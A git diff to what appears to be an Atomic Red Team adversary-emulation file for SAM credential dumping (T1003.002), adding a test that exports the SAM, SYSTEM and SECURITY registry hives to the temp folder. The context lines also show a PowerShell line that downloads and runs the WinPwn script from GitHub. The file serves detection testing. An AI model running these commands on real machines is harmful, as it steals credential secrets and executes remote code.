diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index 5b7ea970..2da85875 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -172,3 +172,21 @@ atomic_tests:
       iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
       samfile -consoleoutput -noninteractive  
     name: powershell
+
+- name: Dumping of SAM, creds, and secrets(Reg Export)
+  description: |
+    Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Used reg export to execute this behavior
+    Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg export HKLM\sam %temp%\sam
+      reg export HKLM\system %temp%\system
+      reg export HKLM\security %temp%\security
+    cleanup_command: |
+      del %temp%\sam >nul 2> nul
+      del %temp%\system >nul 2> nul
+      del %temp%\security >nul 2> nul
+    name: command_prompt
+    elevation_required: true